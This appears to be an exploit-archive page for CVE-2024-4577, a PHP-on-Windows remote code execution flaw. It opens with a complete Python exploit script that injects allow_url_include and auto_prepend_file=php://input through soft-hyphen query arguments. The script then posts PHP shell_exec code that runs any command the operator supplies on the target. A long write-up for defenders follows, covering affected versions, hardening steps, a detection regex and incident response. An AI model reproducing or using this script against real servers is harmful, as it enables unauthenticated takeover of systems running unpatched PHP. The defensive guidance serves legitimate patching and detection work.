PHP < 8.3.8 - Remote Code Execution (Unauthenticated) (Windows)

Exploit Author: Yesith Alvarez Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2024-06-14 
# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.php.net/downloads.php
# Version: PHP 8.3,* < 8.3.8,  8.2.*<8.2.20, 8.1.*, 8.1.29
# CVE : CVE-2024-4577

from requests import Request, Session
import sys
import json



def title():
    print('''
    
   _______      ________    ___   ___ ___  _  _          _  _   _____ ______ ______ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \| || |        | || | | ____|____  |____  |
 | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__     / /    / / 
 | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______|__   _|___ \   / /    / /  
 | |____   \  /  | |____    / /_| |_| / /_   | |           | |  ___) | / /    / /   
  \_____|   \/   |______|  |____|\___/____|  |_|           |_| |____/ /_/    /_/                                                                                                              
                                                                                                                      
                                                                              
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py
    ''')   


def exploit(url, command):       
    payloads = {
        '<?php echo "vulnerable"; ?>',
        '<?php echo shell_exec("'+command+'"); ?>' 
    }    
    headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
    'Content-Type': 'application/x-www-form-urlencoded'}
    s = Session()
    for payload in payloads:
        url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
        req = Request('POST', url, data=payload, headers=headers)
        prepped = req.prepare()
        del prepped.headers['Content-Type']
        resp = s.send(prepped,
        verify=False,
        timeout=15)
        #print(prepped.headers)
        #print(url)
        #print(resp.headers)       
        #print(payload)
        print(resp.status_code)
        print(resp.text)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 2):
        print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0]))        
        exit(0)
    else:
        exploit(sys.argv[1],sys.argv[2])


PHP < 8.3.8 — CVE-2024-4577 (Windows) — Unauthenticated Remote Code Execution: Overview, Detection, and Mitigation

This article provides a practical, defender-focused analysis of CVE-2024-4577 — an unauthenticated remote code execution vulnerability affecting several PHP releases on Windows. It covers what administrators need to know: affected versions, high‑level technical root cause, risk assessment, detection guidance, mitigation and hardening recommendations, and safe testing practices for isolated labs. The content is written for security engineers, system administrators, incident handlers and DevOps teams responsible for PHP-hosted infrastructure.

Executive summary

CVE-2024-4577 is a high‑severity remote code execution (RCE) vulnerability affecting PHP releases prior to fixed versions (see the affected list below). The vulnerability allows an unauthenticated remote attacker to cause PHP to execute attacker‑controlled code on some Windows deployments by abusing how certain runtime configuration values and stream wrappers are handled. Successful exploitation can lead to full system compromise of hosts running the vulnerable PHP build. Immediate action should be taken: prioritize patching, apply configuration mitigations, and monitor for indicators of compromise.

Affected versions

BranchVulnerablePatched Version
8.3.x< 8.3.88.3.8+
8.2.x< 8.2.208.2.20+
8.1.x< 8.1.298.1.29+

CVE: CVE-2024-4577

High-level technical root cause (non-actionable)

  • The vulnerability arises from how PHP on Windows processed certain runtime configuration changes and stream wrappers when configuration values are set via external inputs. This could allow an attacker to influence PHP's runtime initialization path in a way that leads to execution of attacker-supplied PHP code.
  • While the underlying issue is implementation-specific, the class of problem is: untrusted user input influencing configuration or file-inclusion behavior that can result in code execution.
  • This vulnerability is platform-specific in its exploitation details (Windows), so risk and exploitation techniques differ from Unix-like environments.

Impact and attack surface

  • Unauthenticated remote code execution — an attacker does not need valid credentials to attempt exploitation.
  • Affects exposed HTTP(S) servers running vulnerable PHP builds. Public-facing PHP web applications and hosting panels are at highest risk.
  • Successful exploitation can lead to arbitrary PHP code execution, remote command execution, data exfiltration, persistence and lateral movement.

Immediate mitigation actions (prioritized)

  • Patch immediately. Upgrading to the fixed PHP releases listed in the table above is the only guaranteed remediation.
  • If an immediate patch is not possible, apply configuration mitigations:
    • Ensure dangerous INI directives are set to safe values in php.ini (for example, disable any settings that allow remote inclusion of code and avoid allowing user-supplied configuration overrides).
    • Disable or restrict features that allow PHP to include remote or user-controlled code (see hardening section below).
  • Block suspicious requests at the network perimeter and WAF layer — see detection & blocking patterns below.
  • Isolate and investigate any hosts showing signs of compromise before applying in-place changes that might destroy forensic evidence.

Hardening recommendations

  • Apply the vendor-supplied patches or upgrade to the fixed releases as the primary remediation.
  • Harden php.ini and runtime settings:
    • Set allow_url_include = Off (do not allow remote file inclusion).
    • Set allow_url_fopen = Off unless explicitly required.
    • Disable any ability for end users to change critical INI settings (e.g., via .user.ini or ini_set) in exposed contexts.
  • Run PHP with the least-privilege service account; restrict filesystem permissions for the PHP process and web document root.
  • Employ application allowlists: run only required PHP extensions and disable unused ones.
  • Use an up-to-date Web Application Firewall (WAF) and configure rules to detect and block suspicious parameter tampering and attempts to change runtime options via HTTP requests.
  • Network segmentation: place management interfaces and back-end services behind additional access controls and do not expose them publicly.

Detection guidance and indicators of compromise (IOCs)

The detection approach should focus on web server request logs, PHP error logs, and unusual process activity. Below are defensive signals to look for; these are intentionally generic and focus on indicators, not exploit recipes.

  • Unusual query strings or POST bodies that mention configuration-related tokens (e.g., parameter names or INI directive names).
  • Requests that result in immediate 500/502 HTTP responses from PHP or show unexpected PHP output in server responses.
  • New or modified files in the webroot that contain PHP code, especially files created by the webserver user.
  • Command shells or base64-encoded payloads appearing in logs or on disk.
  • Outgoing network connections initiated by the webserver/PHP process to unfamiliar destinations.

Example detection patterns (do not use as exploit payloads)

Use logging and monitoring rules that flag requests containing keywords that suggest attempts to manipulate runtime or file-inclusion logic. These examples are suitable for WAF signatures and SIEM alerts:


Regex examples (conceptual):
- (?i)\b(auto_prepend_file|allow_url_include|allow_url_fopen|php_ini|php_value|php_flag)\b
- Requests creating or modifying files in the document root, or POST bodies with <?php or similar markers

Explanation: The patterns above are designed to detect attempts to change PHP runtime behaviour or attempts to send PHP code to the server. They are intentionally generic; tuning is required to avoid false positives in environments that legitimately use these directives.

Incident response checklist

  • If you suspect compromise, isolate affected systems from the network (preserve volatile state for forensic analysis where possible).
  • Collect logs: web server access/error logs, PHP logs, system event logs, and any relevant process or network captures.
  • Look for web-created files, suspicious scheduled tasks, and new accounts or services.
  • Perform memory and disk forensics before reimaging. If reimaging, retain forensic copies of disks/images for later analysis.
  • Notify stakeholders and follow internal breach response policies; consider regulatory notification requirements if data exposure is suspected.

Safe testing and proof-of-concept (lab guidance)

Reproducing a vulnerability for research or testing must be done only in isolated, controlled laboratory environments that do not connect to production or the public internet. Do not attempt to test this vulnerability against systems you do not own or have explicit written permission to test.

Safe verification steps you can run locally (non-exploitable, for inventory and validation):


# On a Windows system with PHP installed locally, check the installed PHP version:
php -v

# Check specific runtime settings via CLI:
php -i | findstr /I "allow_url_include allow_url_fopen"

Explanation: These commands let you verify the PHP version and inspect relevant INI settings on systems you control. They do not perform any network interaction or exploit activity. Use them to prioritize upgrades and identify configurations that should be hardened.

Patch and update guidance for Windows hosts

  • Obtain official PHP builds or security updates from the vendor (php.net) or your platform vendor. Do not use untrusted third‑party binaries.
  • Follow vendor instructions for stopping web services, replacing the PHP binaries, and validating the service after upgrade.
  • After patching, verify the PHP version (php -v) and run application functional tests to ensure compatibility.
  • For automated environments, include the version check and patch deployment in your configuration management pipeline (Chef, Ansible, SCCM, etc.).

Long-term programmatic mitigations

  • Maintain an inventory of PHP versions and deployment topology (OS, SAPI, extensions) so you can quickly triage newly disclosed vulnerabilities.
  • Roll out a fast patching cadence for third-party platforms and prioritize internet-facing servers.
  • Integrate vulnerability scanning and continuous monitoring to detect outdated PHP versions and unsafe configurations automatically.

Further reading and references

  • Vendor advisories and official PHP release notes (see php.net downloads & release announcements for fixed versions).
  • Incident response best practices and forensic guidance from established vendors and CERTs.

Summary

CVE-2024-4577 is a serious unauthenticated RCE vulnerability affecting multiple PHP releases on Windows. The recommended course is immediate patching to the fixed releases, coupled with configuration hardening, perimeter detection, and incident response readiness. Apply mitigations urgently, monitor for indicators of compromise, and treat any suspicious activity as high priority.